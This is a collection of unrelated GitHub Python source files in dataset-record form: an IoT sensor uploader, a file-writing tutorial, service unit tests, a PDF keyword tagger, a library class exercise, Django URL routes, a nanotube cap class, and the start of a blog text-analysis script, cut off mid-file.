plt.show()\n","repo_name":"fatemehYP/CV_ML_Projects","sub_path":"face_alignment.py","file_name":"face_alignment.py","file_ext":"py","file_size_in_byte":3238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20195766106","text":"# all configuration settings come from config.py\ntry:\n\timport hana_config as config\nexcept ImportError:\n\tprint(\"__HANA__: Please copy template-config.py to config.py and configure appropriately !\"); exit();\n\ndebug_communication=1\n\nimport urllib3\nimport time\nimport json\n\nimport sys\nimport signal\nimport threading\n\nclass hana_uploader(threading.Thread):\n\tdef __init__(self):\n\t\tthreading.Thread.__init__(self)\n\t\tself.http = self.url = self.headers = self.body = None\n\t\tself.initialized = False\n\t\tself.stop = False\n\t\tself.sensor_data = [ [0,0,0] , [0,0,0] , [0,0,0] , [0,0,0] , [0,0,0] , [0,0,0] , [0,0,0] , [0,0,0] , [0,0,0] , [0,0,0] ]\n\t\n\tdef run(self):\n\t\t# disable InsecureRequestWarning if your are working without certificate verification\n\t\t# see https://urllib3.readthedocs.org/en/latest/security.html\n\t\t# be sure to use a recent enough urllib3 version if this fails\n\t\ttry:\n\t\t\turllib3.disable_warnings()\n\t\texcept:\n\t\t\tprint(\"__HANA__: urllib3.disable_warnings() failed - get a recent enough urllib3 version to avoid potential InsecureRequestWarning warnings! Can and will continue though.\")\n\n\t\t# use with or without proxy\n\t\tif (config.proxy_url == ''):\n\t\t\tself.http = urllib3.PoolManager()\n\t\telse:\n\t\t\tself.http = urllib3.proxy_from_url(config.proxy_url)\n\n\t\tself.url='https://iotmms' + config.hcp_account_id + config.hcp_landscape_host + '/com.sap.iotservices.mms/v1/api/http/data/' + str(config.device_id)\n\n\t\tself.headers = urllib3.util.make_headers(user_agent=None)\n\n\t\t# use with authentication\n\t\tself.headers['Authorization'] = 'Bearer ' + config.oauth_credentials_for_device\n\t\tself.headers['Content-Type'] = 'application/json;charset=utf-8'\n\n\t\tprint(\"__HANA__: Success at IoT Service Config\")\n\n\t\tself.initialized = True\n\n\t\twhile not self.stop:\n\t\t\t\ttime.sleep(1)\n\t\t\t\tself.send_to_hcp(int(time.time()), \"CC2650_01\", self.sensor_data[3][0], self.sensor_data[3][1], self.sensor_data[3][2], self.sensor_data[6][0], self.sensor_data[5][0])\n\n\tdef update_sensor_data(self, sensor_data):\n\t\tself.sensor_data = sensor_data\n\n\tdef set_stop(self):\n\t\tself.stop = True\n\n\tdef is_initialized(self):\n\t\treturn self.initialized\n\n\tdef send_to_hcp(self, TimeStamp, sensor_id, acc_x, acc_y, acc_z, Temp, Hum):\n\t\tbody= self.create_body(TimeStamp, sensor_id, acc_x, acc_y, acc_z, Temp, Hum)\n\t\tself.upload_to_hcp(self.http, self.url, self.headers, body)\n\t\tif (debug_communication == 1):\n\t\t\tprint(\"Sent to HCP\")\n\n\tdef upload_to_hcp(self, http, url, headers, body):\n\t\t#print(timestamp)\n\t\t#print(body)\n\t\t#print(url)\n\t\tr = http.urlopen('POST', url, body=body, headers=headers)\n\t\tif (debug_communication == 1):\n\t\t\tprint(\"__HANA__: send_to_hcp():\" + str(r.status))\n\t\t\tprint(r.data)\n\n\tdef create_body(self, TimeStamp, sensor_id, acc_x, acc_y, acc_z, Temp, Hum):\n\t\tbody='{\"mode\":\"async\",\"messageType\":'+ str(config.message_type_id_From_device) +',\"messages\":[{\"Timestamp\":'+ str(TimeStamp) +',\"Sensor_ID\":'+ str(sensor_id) +',\"ACC_X\":'+ str(acc_x) +',\"ACC_Y\":'+ str(acc_y) +',\"ACC_Z\":'+ str(acc_z) +',\"Temperature\":'+ str(Temp) +',\"Humidity\":'+ str(Hum) +'}]}'\n\t\treturn 
body\n\n\tdef poll_from_hcp(self, http, url, headers):\n\t\tglobal msg_string\n\n\t\tr = http.urlopen('GET', url, headers=headers)\n\t\tif (debug_communication == 1):\n\t\t\tprint(\"poll_from_hcp():\" + str(r.status))\n\t\t\tprint(r.data)\n\t\tjson_string='{\"all_messages\":'+(r.data).decode(\"utf-8\")+'}'\n\t\t# print(json_string)\n\n\t\ttry:\n\t\t\tjson_string_parsed=json.loads(json_string)\n\t\t\t# print(json_string_parsed)\n\t\t\t# take care: if multiple messages arrive in 1 payload - their order is last in / first out - so we need to traverse in reverese order\n\t\t\ttry:\n\t\t\t\tmessages_reversed=reversed(json_string_parsed[\"all_messages\"])\n\t\t\t\tfor single_message in messages_reversed:\n\t\t\t\t\t# print(single_message)\n\t\t\t\t\tpayload=single_message[\"messages\"][0]\n\t\t\t\t\topcode=payload[\"opcode\"]\n\t\t\t\t\toperand=payload[\"operand\"]\n\t\t\t\t\t# print(opcode)\n\t\t\t\t\t# print(operand)\n\t\t\t\t\t# now do things depending on the opcode\n\t\t\t\t\tif (opcode == \"display\"):\n\t\t\t\t\t\t# print(operand)\n\t\t\t\t\t\t# we write to the display at one centralized point only\n\t\t\t\t\t\tmsg_string=operand\n\t\t\t\t\tif (opcode == \"led\"):\n\t\t\t\t\t\tif (operand == \"0\"):\n\t\t\t\t\t\t\t# print(\"LED off\")\n\t\t\t\t\t\t\tswitch_led(0)\n\t\t\t\t\t\tif (operand == \"1\"):\n\t\t\t\t\t\t\t# print(\"LED on\")\n\t\t\t\t\t\t\tswitch_led(1)\n\t\t\texcept TypeError:\n\t\t\t\tprint(\"__HANA__: Problem decoding the message \" + (r.data).decode(\"utf-8\") + \" retrieved with poll_from_hcp()! Can and will continue though.\")\n\t\texcept ValueError:\n\t\t\tprint(\"__HANA__: Problem decoding the message \" + (r.data).decode(\"utf-8\") + \" retrieved with poll_from_hcp()! Can and will continue though.\")\n\t\t\nif __name__ == '__main__':\n\thana_uploader()\n\tprint(\"Done.\")\n","repo_name":"varappavoo/sensorTag-2","sub_path":"hana_upload.py","file_name":"hana_upload.py","file_ext":"py","file_size_in_byte":4618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74852386153","text":"'''\n文件操作一般步骤:\n打开文件、读写文件、保存文件、关闭文件\n'''\n# 打开文件:open(路径, 打开模式)\n# 常用模式:\n# r:默认模式,以只读方式打开,文件指针会放在文件开头\n# w:写入,已存在就覆盖,不存在就创建\n# a:追加,存在就指针放结尾,不存在就创建\n\n# 打开文件\n# 注意,默认打开的编码模式是GBK\n# 最好在打开时指定一个编码类型\nfile = open('./12-文件读写/test.txt', 'w', encoding='utf-8')\n\n# 读写文件\nfile.write('我爱China')\nfile.write('\\n无产阶级,联合起来!') # 注意,w模式下打开会覆盖\n\n# 保存并关闭文件\nfile.close()\n\n# 以二进制方式读写\nfile = open('./12-文件读写/test1.txt', 'wb')\nfile.write('叔叔我啊,最喜欢钱了'.encode('utf-8')) # 注意,用encode是把字符串转换成了bytes\nfile.close()\n\n# 追加方式(有不覆盖,没有就创建)\nfile = open('./12-文件读写/test1.txt', 'a', encoding='utf-8')\nfile.write('\\n曹仁,南蛮什么时候杀啊') # 不是二进制就不需要用encode\nfile.write('\\n你所热爱的,就是你的生活!')\nfile.close()\n\n# 二进制追加\nfile = open('./12-文件读写/test1.txt', 'ab')\nfile.write('\\n我们承诺:……'.encode('utf-8'))\nfile.close()\n","repo_name":"529106896/PythonLearning","sub_path":"py-project/12-文件读写/01-文件写.py","file_name":"01-文件写.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12037474742","text":"import pytest\n\nfrom transiter import exceptions\nfrom transiter.db import models\nfrom transiter.db.queries import alertqueries, tripqueries, routequeries\nfrom transiter.services import tripservice, views\n\n\ndef test_list_all_in_route__route_not_found(monkeypatch, route_1_model):\n monkeypatch.setattr(\n routequeries, \"get_in_system_by_id\", lambda *args, **kwargs: None\n )\n\n with 
pytest.raises(exceptions.IdNotFoundError):\n tripservice.list_all_in_route(route_1_model.system.id, route_1_model.id)\n\n\ndef test_list_all_in_route(\n monkeypatch,\n route_1_model,\n trip_1_model,\n trip_1_view,\n trip_2_model,\n trip_2_view,\n stop_1_model,\n stop_1_small_view,\n stop_2_model,\n stop_2_small_view,\n):\n monkeypatch.setattr(\n routequeries, \"get_in_system_by_id\", lambda *args, **kwargs: route_1_model\n )\n monkeypatch.setattr(\n tripqueries,\n \"list_all_in_route_by_pk\",\n lambda *args, **kwargs: [trip_1_model, trip_2_model],\n )\n monkeypatch.setattr(\n tripqueries,\n \"get_trip_pk_to_last_stop_map\",\n lambda *args, **kwargs: {\n trip_1_model.pk: stop_1_model,\n trip_2_model.pk: stop_2_model,\n },\n )\n monkeypatch.setattr(\n alertqueries, \"get_trip_pk_to_active_alerts\", lambda *args, **kwargs: {}\n )\n\n expected = [trip_1_view, trip_2_view]\n\n expected[0].last_stop = stop_1_small_view\n expected[0].alerts = []\n expected[0].vehicle = None\n expected[1].last_stop = stop_2_small_view\n expected[1].alerts = []\n expected[1].vehicle = None\n\n actual = tripservice.list_all_in_route(route_1_model.system.id, route_1_model.id)\n\n assert expected == actual\n\n\ndef test_get_in_route_by_id__trip_not_found(monkeypatch, trip_1_model):\n monkeypatch.setattr(tripqueries, \"get_in_route_by_id\", lambda *args, **kwargs: None)\n\n with pytest.raises(exceptions.IdNotFoundError):\n tripservice.get_in_route_by_id(\n trip_1_model.route.system.id, trip_1_model.route.id, trip_1_model.id\n )\n\n\ndef test_get_in_route_by_id(\n monkeypatch,\n route_1_model,\n route_1_small_view,\n trip_1_model,\n trip_1_view,\n stop_1_model,\n stop_1_small_view,\n):\n monkeypatch.setattr(\n tripqueries, \"get_in_route_by_id\", lambda *args, **kwargs: trip_1_model\n )\n monkeypatch.setattr(\n alertqueries, \"get_trip_pk_to_active_alerts\", lambda *args, **kwargs: {}\n )\n\n stop_time = models.TripStopTime(stop_sequence=1)\n stop_time.stop = stop_1_model\n trip_1_model.stop_times = [stop_time]\n\n expected = trip_1_view\n expected.stop_times = [views.TripStopTime.from_model(stop_time)]\n expected.alerts = []\n expected.vehicle = None\n expected.route = route_1_small_view\n expected.stop_times[0].stop = stop_1_small_view\n\n actual = tripservice.get_in_route_by_id(\n trip_1_model.route.system.id, trip_1_model.route.id, trip_1_model.id\n )\n\n assert expected == actual\n","repo_name":"jamespfennell/transiter-python","sub_path":"tests/unit/services/test_tripservice.py","file_name":"test_tripservice.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20167440320","text":"import PyPDF2\nimport textract\nimport os\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nimport nltk\nimport string\nfrom itertools import islice\nnltk.download('punkt')\nnltk.download('stopwords')\nnltk.download('averaged_perceptron_tagger')\n\ndef get_pdf_title(pdf_file_path):\n pdf_reader = PyPDF2.PdfFileReader(open(pdf_file_path, \"rb\")) \n return pdf_reader.getDocumentInfo().title\n\ndef get_tags(filename):\n \"\"\"Reads Most frequent tags appearing in the PDF or Image\"\"\"\n extension = filename.split('.')[-1];\n text = \"\"\n title = \"\"\n if extension == 'pdf':\n pdfFileObj = open(filename,'rb')\n pdfReader = PyPDF2.PdfFileReader(pdfFileObj)\n num_pages = pdfReader.numPages\n count = 0\n\n #The while loop will read each page.\n while count < num_pages:\n pageObj = pdfReader.getPage(count)\n count 
+=1\n text += pageObj.extractText()\n\n title = get_pdf_title(filename)\n\n if title:\n text += \" \" + title\n\n if text == \"\":\n text = textract.process(os.path.join(os.getcwd(), filename), method='tesseract', language='eng')\n\n if not isinstance(text, str):\n text = text.decode(\"utf-8\")\n\n tokens = word_tokenize(text)\n if title:\n tokens += word_tokenize(title) \n\n stop_words = string.punctuation #set(stopwords.words('english') + list(string.punctuation))\n # stop_words = set(stopwords.words('english') + list(string.punctuation))\n\n keywords = [word for word in tokens if not word in stop_words]\n\n #removing everything except nouns\n tags = nltk.pos_tag(keywords)\n nouns = [word for word,pos in tags if (pos == 'NN' or pos == 'NNP' or pos == 'NNS' or pos == 'NNPS')]\n # print(keywords)\n\n keyword_freqency = dict()\n\n for word in nouns:\n keyword_freqency[word] = keyword_freqency.get(word, 0) + 1\n\n sorted_keywords = {\n k: v for k, \n v in sorted(keyword_freqency.items(), key=lambda item: item[1], reverse=True)\n }\n frequent_keywords = list(islice(sorted_keywords, 10))\n return frequent_keywords\n\n\nfilename = 'UPSC FORM FURKAN.pdf'\n# filename = 'NPR_NRIC.PNG' \n# filename = 'RCA-XOVER-JIRA.pdf' \n\n# print(\"Tags\", get_tags(filename))\n\n","repo_name":"tabishmahfuz1/document-parser","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44216223143","text":"#!/usr/bin/env python3\nimport random\n\nclass Personne:\n\n def __init__(self, nom, prenom):\n self.nom = nom\n self.prenom = prenom\n\n def se_presenter(self):\n print(\"Je suis {} {}\".format(self.prenom, self.nom))\n\n def __repr__(self):\n print(\"Je suis {} {}\".format(self.prenom, self.nom))\n\n def _get_prenom(self):\n try:\n return self.prenom\n except:\n print(\"Cannot get prenom\")\n\n def _get_nom(self):\n try:\n return self.nom\n except:\n print(\"Cannot get nom\")\n\n def _set_prenom(self, newPrenom):\n try:\n self.prenom = newPrenom\n except:\n print(\"Cannot set nom\")\n\n def _set_nom(self, newName):\n try:\n self.nom = newName\n except:\n print(\"Cannot set nom\")\n property(_get_nom, _set_nom)\n property(_get_prenom, _set_prenom)\n\nclass Auteur(Personne):\n\n def __init__(self, nom, prenom):\n self.oeuvre = []\n super().__init__(nom, prenom)\n\n def listerOeuvre(self):\n print(\"Moi, {} {} j'ai fierement écrit {} livre{}, les voicis \".format(self.nom, self.prenom, len(self.oeuvre), \"s\" if len(self.oeuvre) > 1 else \"\"))\n for oeuvre in self.oeuvre:\n print(\"-{}\".format(oeuvre.titre))\n print(\"Mais d'autres histoires sont encore a venir !\")\n\n def ecrireLivre(self, titre):\n self.oeuvre.append(Livre(titre, self))\n\n\nclass Client(Personne):\n def __init__(self, nom, prenom):\n self.collection = []\n super().__init__(nom, prenom)\n\n def inventaire(self):\n print(\"Moi, {} {} j'ai fierement loué {} livre{}, les voicis \".format(self.nom, self.prenom, len(self.collection), \"s\" if len(self.collection) > 1 else \"\"))\n for oeuvre in self.collection:\n print(\"-{}\\n\".format(oeuvre))\n print(\"Mais j'ai toujours plus faim d'histoires\")\n\n\nclass Livre:\n\n def __init__(self, titre, auteur):\n if type(auteur) is Auteur:\n self.titre = titre\n self.auteur = auteur\n else :\n raise TypeError(\"Author is an Author type\")\n\n def print(self):\n print(\"Titre:{} Auteur:{}\".format(self.titre, self.auteur))\n\nclass Bibliotheque:\n\n def __init__(self, 
nom, catalogue=[]):\n self.nom = nom\n self.catalogue = catalogue\n\n def acheterLivre(self, autor, livre_titre, quantite):\n for livre in autor.oeuvre:\n if livre.titre == livre_titre:\n self.catalogue[livre_titre] = quantite\n return\n print(\"Pas de {} dans la biblio de {} {} !\".format(livre_titre, autor.nom, autor.prenom))\n\n def inventaire(self):\n print(\"Nous avons {} livre{}, les voicis \".format(len(self.catalogue), \"s\" if len(self.catalogue) > 1 else \"\"))\n for livre in self.catalogue:\n print(\"{} {} en {} exemplaire{}\".format(livre, self.catalogue[livre],len(self.catalogue), \"s\" if len(self.catalogue)>1 else \"\"))\n\n def louerLivre(self, client, nom_livre):\n if nom_livre in self.catalogue :\n self.catalogue[nom_livre] -= 1\n client.collection.append(nom_livre)\n else :\n print(\"Pas de ca dans notre biblio !\")\n\n def rendreLivre(self, client, livre):\n if livre in client.collection:\n for i in range(len(client.collection)):\n if client.collection[i] == livre:\n del client.collection[i]\n break\n self.catalogue[livre] += 1\n else :\n print(\"Le client {} {} n'as pas le livre {}\".format(client.nom, client.prenom, livre))\n\na = Personne('a', 'aaron')\n#a.se_presenter()\n\naut = Auteur('au', 'aut')\naut.ecrireLivre('Magazine IKEA')\naut.ecrireLivre('la bible')\n#aut.listerOeuvre()\n\ncli = Client('cli', 'Client')\ncli.inventaire()\n\nbi = Bibliotheque('sacre coeur', {})\nbi.louerLivre(cli, 'Magazine IKEA')\nbi.acheterLivre(aut, 'Magazine IKEA', 4)\nbi.inventaire()\nbi.louerLivre(cli, 'Magazine IKEA')\ncli.inventaire()\nbi.inventaire()\nbi.rendreLivre(cli, 'Magazine IKEA')\n\nbi.inventaire()\ncli.inventaire()\n","repo_name":"samuel-joly/runtrack-python","sub_path":"jour02/job07/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4113,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3333057166","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu May 5 17:56:11 2022\r\n\r\n@author: Nevermore\r\n\"\"\"\r\n\r\nfrom practice_class import Pessoa\r\n\r\np1 = Pessoa(\"Nevermore\", 22)\r\np2 = Pessoa(\"Mat\", 22)\r\np1.falar(\"Rocket League\")\r\np2.falar(\"química\")\r\nprint(p1.ano_atual)\r\nprint(Pessoa.ano_atual)\r\n\r\nprint(p1.ano_nascimento())","repo_name":"n3vrmr/class-pclp","sub_path":"importing_class.py","file_name":"importing_class.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20998787596","text":"from django.conf.urls import patterns, include, url\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # url(r'^$', 'DocuCanvas.views.home', name='home'),\n # url(r'^DocuCanvas/', include('DocuCanvas.foo.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n (r'^$', 'dashboard.views.dashboard'),\n url(r'^admin/doc/', include('django.contrib.admindocs.urls')), # wjmazza - 2013.06.27 - This used/needed?\n\n # Uncomment the next line to enable the admin:\n url(r'^admin/', include(admin.site.urls)),\n url(r'^accounts/', include('auth.urls')),\n #\n url(r'^acct/', include('accounts.urls')), # wjmazza - 2013.06.27 - This used/needed?\n url(r'^bug/', include('bugs.urls')), # wjmazza - 2013.06.27 - This used/needed?\n url(r'^board/', include('boards.urls')),\n #url(r'^suggestion/', include('suggestions.urls')),\n #url(r'^task/', include('tasks.urls')),\n #url(r'^node/', 
include('nodes.urls')),\n url(r'^notification/', include('notifications.urls')),\n url(r'^newsfeed/', include('newsfeed.urls')),\n url(r'^checklist/', include('checklists.urls')),\n url(r'^project/', include('projects.urls')),\n url(r'^issue/', include('issues.urls')),\n url(r'^reports/', include('daily_reports.urls')),\n url(r'^auth/', include('auth.urls')),\n url(r'^food/', include('food.urls')),\n url(r'^help/', include('helpdesknew.urls')),\n url(r'^gapps/', include('gapps.urls')),\n # url(r'^tinymmce/', include('tinymce.urls')),\n url(r'^charts/', include('charts.urls')),\n #url(r'^facebook/', include('facebook.urls')),\n #url(r'^twitter/', include('twitter.urls')),\n url(r'^socialplatform/', include('socialplatform.urls')),\n url(r'^polls/', include('polls.urls')),\n url(r'^feedback/', include('feedback.urls')),\n #\n url(r'^docs/', include('docs.urls')), # wjmazza - 2013.07.09 - TEMP - R&D Test View\n url(r'^sitesearch', include('search.urls')),\n url(r'^research/', include('taxes.urls')),\n url(r'^sprints/', include('sprints.urls')),\n url(r'^git/', include('gitHooks.urls')),\n)\n","repo_name":"tekton/DocuCanvas","sub_path":"DocuCanvas/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"38560430988","text":"import pygame\nimport random\n\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\n\nclass Box(pygame.sprite.Sprite):\n def __init__(self, x, y, speed, color):\n super().__init__()\n self.x = x\n self.y = y\n self.w = random.randint(31, 100)\n self.h = random.randint(31, 50)\n self.image = pygame.Surface((self.w, self.h)) # 平面\n self.image.fill(color)\n self.rect = self.image.get_rect() # 取得長方形\n self.rect.x = self.x\n self.rect.y = self.y\n self.speed = speed\n\n def update(self):\n self.rect.x -= self.speed","repo_name":"0204ryan/box","sub_path":"box.py","file_name":"box.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39326734066","text":"from nanocap.core.globals import *\nimport os,sys,math,copy,random,time\nimport numpy\nimport nanocap.core.points as points\nfrom nanocap.core.util import *\n\nfrom nanocap.clib import clib_interface\nfrom nanocap.structures.structure import Structure\nclib = clib_interface.clib\n\nclass Cap(Structure):\n def __init__(self,secondary=False):\n if(secondary):\n Structure.__init__(self,STRUCTURE_TYPES[CAP_R])\n #self.type = StructureType(CAP_R,\"CAP_R\",\"Cap Secondary\")\n else:\n Structure.__init__(self,STRUCTURE_TYPES[CAP])\n #self.type = StructureType(CAP,\"CAP\",\"Cap Primary\")\n \n def __repr__(self):\n out = super(Cap, self).__repr__() \n return out\n \n def set_carbon_lattice(self,npoints,pos):\n self.carbon_lattice = points.Points(\"Cap Carbon Lattice\")\n self.carbon_lattice.initArrays(npoints)\n self.carbon_lattice.pos = numpy.copy(pos)\n \n \n def setup(self,npoints,free = True, real=True,seed=None,): \n self.dual_lattice = points.Points(\"Cap Dual Lattice Points\")\n \n self.dual_lattice.initArrays(npoints)\n \n if(free==True):\n self.dual_lattice.freeflags = numpy.ones(npoints,NPI)\n self.dual_lattice.freeflagspos = numpy.ones(npoints*3,NPF)\n else:\n self.dual_lattice.freeflags = numpy.zeros(npoints,NPI)\n self.dual_lattice.freeflagspos = numpy.zeros(npoints*3,NPF)\n \n if(real==True): \n self.dual_lattice.realflags = numpy.ones(npoints,NPI)\n 
self.dual_lattice.realflagspos = numpy.ones(npoints*3,NPF)\n else:\n self.dual_lattice.realflags = numpy.zeros(npoints,NPI)\n self.dual_lattice.realflags = numpy.zeros(npoints*3,NPF)\n \n self.dual_lattice.dampflags = numpy.zeros(npoints,NPI)\n self.dual_lattice.dampflagspos = numpy.zeros(npoints*3,NPF)\n \n if(seed==None):\n seed = random.randint(1,100000) \n self.seed = seed \n random.seed(seed)\n sphere_rad = 1.0\n clib.setup_random_points_on_sphere(ctypes.c_int(npoints),\n ctypes.c_int(seed),\n ctypes.c_int(1),\n ctypes.c_double(sphere_rad),\n self.dual_lattice.pos.ctypes.data_as(ctypes.POINTER(ctypes.c_double)))\n \n #set up free atoms on the sphere cap (moved during minimisation)\n # z = -1 to 0 with nanotube from 0 to l \n\n self.dual_lattice.pos0 = numpy.copy(self.dual_lattice.pos) \n printl(\"cap thomson density\",self.dual_lattice.npoints,self.dual_lattice.npoints/(2*math.pi))\n \n N_cap_carbon = NAtoms_from_NDual(npoints,surface=\"cap\")\n self.set_carbon_lattice(N_cap_carbon,None)\n ","repo_name":"CurtinIC/nanocap","sub_path":"nanocap/structures/cap.py","file_name":"cap.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"71300172394","text":"import os\nfrom os import listdir\nimport json\nimport nltk\nimport csv\nimport enchant\nfrom nltk.corpus import words\nfrom nltk.corpus import wordnet as wn\nfrom nltk.corpus import sentiwordnet as swn\n\n\nrootdir = 'blog and comments/'\ncomments_rootdir = 'received blog comments/'\nlecture_dicts_rootdir = 'lecture_word_dicts/'\npost1_dict = {}\npost2_dict = {}\npost3_dict = {}\npost4_dict = {}\n\nstudent_dicts = {}\nreceived_comments_dicts = {}\n\ntotal_lecture_dict = {}\n\n#To load all the text for analysing, including: blog posts and comments from each assignment, individual texts\n\ndef load_analysing_text():\n\n\tfor subdir, dirs, files in os.walk(rootdir):\n\n\t\t#Collect all the data in blog posts and comments\n\t\t\n\t\tstudent_name = os.path.basename(os.path.normpath(subdir))\n\t\t#Create a collector for each individual students\n\t\tif (student_name != 'blog and comments'):\n\t\t\tstudent_dicts[student_name] = {}\n\n\t\tfor file in files:\n\t\t\t#Collect data for blog post 1 from all students\n\t\t\tif file == 'Blog Post 1.txt':\n\t\t\t\twith open(os.path.join(subdir,file),'r') as f:\n\t\t\t\t\tword_dict = {}\n\t\t\t\t\tarticle = f.read()\n\t\t\t\t\twordlist = nltk.WordPunctTokenizer().tokenize(article)\n\t\t\t\t\td = enchant.Dict(\"en_US\")\n\t\t\t\t\t#Lowercase\n\t\t\t\t\twordlist = map(lambda x:x.lower(),wordlist)\n\t\t\t\t\tfor word, pos in nltk.pos_tag(wordlist):\n\n\t\t\t\t\t\t#Check if the word is a valid english word\n\t\t\t\t\t\tif (d.check(word) and len(word) >= 2):\n\t\t\t\t\t\t\t#Select words as our target terminologies\n\n\t\t\t\t\t\t\t#Update blog post for individual students\n\t\t\t\t\t\t\tif word not in student_dicts[student_name]:\n\t\t\t\t\t\t\t\tstudent_dicts[student_name][word] = 0\n\t\t\t\t\t\t\tstudent_dicts[student_name][word] += 1\n\n\t\t\t\t\t\t\t#Collect blog post 1 for all students\n\t\t\t\t\t\t\tif word not in post1_dict:\n\t\t\t\t\t\t\t\tpost1_dict[word] = 0\n\t\t\t\t\t\t\tpost1_dict[word] +=1\n\n\t\t\tif file == 'Blog Post 2.txt':\n\t\t\t\twith open(os.path.join(subdir,file),'r') as f:\n\t\t\t\t\tarticle = f.read()\n\t\t\t\t\twordlist = nltk.WordPunctTokenizer().tokenize(article)\n\t\t\t\t\td = enchant.Dict(\"en_US\")\n\t\t\t\t\t#Lowercase\n\t\t\t\t\twordlist = map(lambda 
x:x.lower(),wordlist)\n\t\t\t\t\tfor word, pos in nltk.pos_tag(wordlist):\n\n\t\t\t\t\t\t#Check if the word is a valid english word\n\t\t\t\t\t\tif (d.check(word) and len(word) >= 2):\t\t\t\t\t\n\n\t\t\t\t\t\t\t#Update blog post for individual students\n\t\t\t\t\t\t\tif word not in student_dicts[student_name]:\n\t\t\t\t\t\t\t\tstudent_dicts[student_name][word] = 0\n\t\t\t\t\t\t\tstudent_dicts[student_name][word] += 1\n\n\t\t\t\t\t\t\t#Collect blog post 2 for all students\n\t\t\t\t\t\t\tif word not in post2_dict:\n\t\t\t\t\t\t\t\tpost2_dict[word] = 0\n\t\t\t\t\t\t\tpost2_dict[word] +=1\n\n\t\t\tif file == 'Blog Post 3.txt':\n\t\t\t\twith open(os.path.join(subdir,file),'r') as f:\n\t\t\t\t\tarticle = f.read()\n\t\t\t\t\twordlist = nltk.WordPunctTokenizer().tokenize(article)\n\t\t\t\t\td = enchant.Dict(\"en_US\")\n\t\t\t\t\t#Lowercase\n\t\t\t\t\twordlist = map(lambda x:x.lower(),wordlist)\n\t\t\t\t\tfor word, pos in nltk.pos_tag(wordlist):\n\n\t\t\t\t\t\t#Check if the word is a valid english word\n\t\t\t\t\t\tif (d.check(word) and len(word) >= 2):\n\n\t\t\t\t\t\t\t#Update blog post for individual students\n\t\t\t\t\t\t\tif word not in student_dicts[student_name]:\n\t\t\t\t\t\t\t\tstudent_dicts[student_name][word] = 0\n\t\t\t\t\t\t\tstudent_dicts[student_name][word] += 1\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t#Collect blog post 3 for all students\n\t\t\t\t\t\t\tif word not in post3_dict:\n\t\t\t\t\t\t\t\tpost3_dict[word] = 0\n\t\t\t\t\t\t\tpost3_dict[word] +=1\n\n\t\t\tif file == 'Blog Post 4.txt':\n\t\t\t\twith open(os.path.join(subdir,file),'r') as f:\n\t\t\t\t\tarticle = f.read()\n\t\t\t\t\twordlist = nltk.WordPunctTokenizer().tokenize(article)\n\t\t\t\t\td = enchant.Dict(\"en_US\")\n\t\t\t\t\t#Lowercase\n\t\t\t\t\twordlist = map(lambda x:x.lower(),wordlist)\n\t\t\t\t\tfor word, pos in nltk.pos_tag(wordlist):\n\n\t\t\t\t\t\t#Check if the word is a valid english word\n\t\t\t\t\t\tif (d.check(word) and len(word) >= 2):\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t#Update blog post for individual students\n\t\t\t\t\t\t\tif word not in student_dicts[student_name]:\n\t\t\t\t\t\t\t\tstudent_dicts[student_name][word] = 0\n\t\t\t\t\t\t\tstudent_dicts[student_name][word] += 1\n\n\t\t\t\t\t\t\t#Collect blog post 4 for all students\n\t\t\t\t\t\t\tif word not in post4_dict:\n\t\t\t\t\t\t\t\tpost4_dict[word] = 0\n\t\t\t\t\t\t\tpost4_dict[word] +=1\n\n\t\t\tif file.endswith('.csv'):\n\t\t\t\twith open(os.path.join(subdir,file), 'r') as file_comments:\n\t\t\t\t\treader = csv.reader(file_comments)\n\t\t\t\t\tarticle_comments = list()\n\t\t\t\t\tarticle_comments.append('')\n\t\t\t\t\tarticle_comments.append('')\n\t\t\t\t\tarticle_comments.append('')\n\t\t\t\t\tarticle_comments.append('')\n\n\t\t\t\t\tfor row in reader:\n\t\t\t\t\t\tif (row[0] != 'Message'):\n\t\t\t\t\t\t\t#Update comment 1\n\t\t\t\t\t\t\tif (int(row[0]) <= 4 and int(row[0]) >= 1 and len(row[3])>0):\n\t\t\t\t\t\t\t\tarticle_comments[0] = article_comments[0] + row[3]\n\t\t\t\t\t\t\t#Update comment 2\n\t\t\t\t\t\t\tif (int(row[0]) <= 8 and int(row[0]) >= 5 and len(row[3])>0):\n\t\t\t\t\t\t\t\tarticle_comments[1] = article_comments[1] + row[3]\t\t\t\t\t\t\n\t\t\t\t\t\t\t#Update comment 3\n\t\t\t\t\t\t\tif (int(row[0]) <= 12 and int(row[0]) >= 9 and len(row[3])>0):\n\t\t\t\t\t\t\t\tarticle_comments[2] = article_comments[2] + 